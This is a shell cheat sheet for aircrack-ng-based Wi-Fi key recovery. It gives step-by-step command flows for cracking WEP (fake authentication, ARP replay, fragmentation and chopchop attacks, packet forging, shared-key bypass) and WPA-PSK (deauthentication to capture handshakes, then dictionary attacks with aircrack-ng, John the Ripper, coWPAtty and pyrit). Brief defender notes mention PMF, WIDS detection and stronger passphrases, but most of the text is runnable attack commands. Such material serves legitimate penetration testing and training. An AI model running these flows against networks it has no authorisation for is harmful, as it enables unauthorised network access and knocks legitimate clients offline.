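# aircrack-ng cheat sheet: WEP and WPA-PSK key recovery flows.
# These are snippets to be run one line at a time in an interactive shell,
# not a script to execute top to bottom (each section is an alternative flow).
#
# Variables the snippets expect in the environment before use:
#   AP_CHANNEL, AP_MAC, AP_ESSID     target AP channel, BSSID and ESSID
#   SELF_MAC                         MAC of the monitor interface (mon0)
#   CLIENT_MAC                       a station associated to the AP
#   FILENAME                         output prefix for airodump-ng -w
#   CAP_FILE / CAPTURE_FILE          the .cap airodump-ng writes under $FILENAME
#                                    (presumably; two names are used for it)
#   WORDLIST, HASH_FILENAME          dictionary / genpmk output (WPA sections)
#   SOURCE_IP, DESTINATION_IP, XOR_FILENAME, PACKET_FILENAME, PRGA_FILENAME
#                                    packetforge-ng / shared-key inputs (WEP)
#
# Every expansion is double-quoted so an ESSID containing spaces or glob
# characters is still passed as a single argument.
#
# Defender note (WEP sections): all four WEP flows work because WEP's RC4
# keystream is reused; no key length or ESSID hiding changes that, the only
# mitigation is retiring WEP. The fake-auth step (aireplay-ng -1) is an
# association from SELF_MAC that a WIDS can flag as an unexpected station.
# Defender note (deauth steps, aireplay-ng -0): 802.11w management-frame
# protection (PMF) rejects spoofed deauthentication frames, so these steps
# fail on PMF-required networks, and the deauth burst is a standard WIDS alert.

# cracking WEP with clients

airmon-ng start wlan0 "$AP_CHANNEL"

airodump-ng -c "$AP_CHANNEL" --bssid "$AP_MAC" -w "$FILENAME" mon0

aireplay-ng -1 0 -e "$AP_ESSID" -a "$AP_MAC" -h "$SELF_MAC" mon0 # Fake-auth

aireplay-ng -3 -b "$AP_MAC" -h "$SELF_MAC" mon0 # ARP Replay attack

aireplay-ng -0 1 -a "$AP_MAC" -c "$CLIENT_MAC" mon0 # Deauthentication to get an ARP packet faster

aircrack-ng -0 "$CAP_FILE"


# cracking WEP via a client

airmon-ng start wlan0 "$AP_CHANNEL"

airodump-ng -c "$AP_CHANNEL" --bssid "$AP_MAC" -w "$FILENAME" mon0

aireplay-ng -1 0 -e "$AP_ESSID" -a "$AP_MAC" -h "$SELF_MAC" mon0 # Fake auth

aireplay-ng -2 -b "$AP_MAC" -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # Interactive packet reply attack

aircrack-ng -0 -z -n 64 "$CAP_FILE"


# clientless WEP cracking

airmon-ng start wlan0 "$AP_CHANNEL"

airodump-ng -c "$AP_CHANNEL" --bssid "$AP_MAC" -w "$FILENAME" mon0

aireplay-ng -1 0 -e "$AP_ESSID" -a "$AP_MAC" -h "$SELF_MAC" mon0 # Fake-auth

aireplay-ng -5 -b "$AP_MAC" -h "$SELF_MAC" mon0 # Fragmentation attack for PRGA

aireplay-ng -4 -b "$AP_MAC" -h "$SELF_MAC" mon0 # If Frag attack fails, use Korek ChopChop attack for PRGA

packetforge-ng -0 -a "$AP_MAC" -h "$SELF_MAC" -l "$SOURCE_IP" -k "$DESTINATION_IP" -y "$XOR_FILENAME" -w "$PACKET_FILENAME" # After got PRGA

aireplay-ng -2 -r "$PACKET_FILENAME" mon0 # Interactive packet reply after crafted the packet

aircrack-ng -0 "$CAP_FILE"


# bypassing WEP SKA

airmon-ng start wlan0 "$AP_CHANNEL"

airodump-ng -c "$AP_CHANNEL" --bssid "$AP_MAC" -w "$FILENAME" mon0

aireplay-ng -0 1 -a "$AP_MAC" -c "$CLIENT_MAC" mon0 # Deauthentication attack for PRGA xor file

aireplay-ng -1 60 -e "$AP_ESSID" -y "$PRGA_FILENAME" -a "$AP_MAC" -h "$SELF_MAC" mon0 # Shared key fake auth attack

aireplay-ng -3 -b "$AP_MAC" -h "$SELF_MAC" mon0 # ARP Replay attack

aireplay-ng -0 1 -a "$AP_MAC" -c "$CLIENT_MAC" mon0 # Deauthentication to get an ARP packet faster

aircrack-ng -0 -z -n 64 "$CAP_FILE"


# Defender note (WPA sections): the cost of every dictionary run below is
# bounded by passphrase entropy only; long random PSKs, or WPA3-SAE which does
# not expose an offline-crackable handshake, are the mitigation.

# cracking WPA PSK

airmon-ng start wlan0 "$AP_CHANNEL"

airodump-ng -c "$AP_CHANNEL" --bssid "$AP_MAC" -w "$FILENAME" mon0

aireplay-ng -0 1 -a "$AP_MAC" -c "$CLIENT_MAC" mon0 # Deauthentication to get a 4 way handshake

aircrack-ng -0 -w "$WORDLIST" "$CAPTURE_FILE" # tool name was misspelled "airacrack-ng"


# cracking WPA with John The Ripper

airmon-ng start wlan0 "$AP_CHANNEL"

airodump-ng -c "$AP_CHANNEL" --bssid "$AP_MAC" -w "$FILENAME" mon0

aireplay-ng -0 1 -a "$AP_MAC" -c "$CLIENT_MAC" mon0 # Deauthentication to get a 4 way handshake

# change to password folder

vim john.conf # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]"

# option is --wordlist (was misspelled --worldlist); john feeds candidates on stdout to aircrack-ng
./john --wordlist="$WORDLIST" --rules --stdout | aircrack-ng -0 -e "$AP_ESSID" -w "$CAPTURE_FILE"


# cracking WPA with coWPAtty

airmon-ng start wlan0 "$AP_CHANNEL"

airodump-ng -c "$AP_CHANNEL" --bssid "$AP_MAC" -w "$FILENAME" mon0

aireplay-ng -0 1 -a "$AP_MAC" -c "$CLIENT_MAC" mon0 # Deauthentication to get a 4 way handshake

cowpatty -r "$CAPTURE_FILE" -f "$WORDLIST" -2 -s "$AP_ESSID" # -s takes the ESSID (dash was missing)

genpmk -f "$WORDLIST" -d "$HASH_FILENAME" -s "$AP_ESSID" # Gen WPA hashes for rainbow attack ($ was missing on HASH_FILENAME)

cowpatty -r "$CAPTURE_FILE" -d "$HASH_FILENAME" -2 -s "$AP_ESSID" # Start the rainbow attack


# cracking WPA with pyrit

airmon-ng start wlan0 "$AP_CHANNEL"

airodump-ng -c "$AP_CHANNEL" --bssid "$AP_MAC" -w "$FILENAME" mon0

aireplay-ng -0 1 -a "$AP_MAC" -c "$CLIENT_MAC" mon0 # Deauthentication to get a 4 way handshake

pyrit list_cores

pyrit -r "$CAPTURE_FILE" -i "$WORDLIST" -b "$AP_MAC" attack_passthrough

# database-backed variant of the same run
pyrit -i "$WORDLIST" import_password # Import the wordlist to the database

pyrit -e "$AP_ESSID" create_essid # Add ESSID to the database

pyrit batch

pyrit -r "$CAPTURE_FILE" attack_db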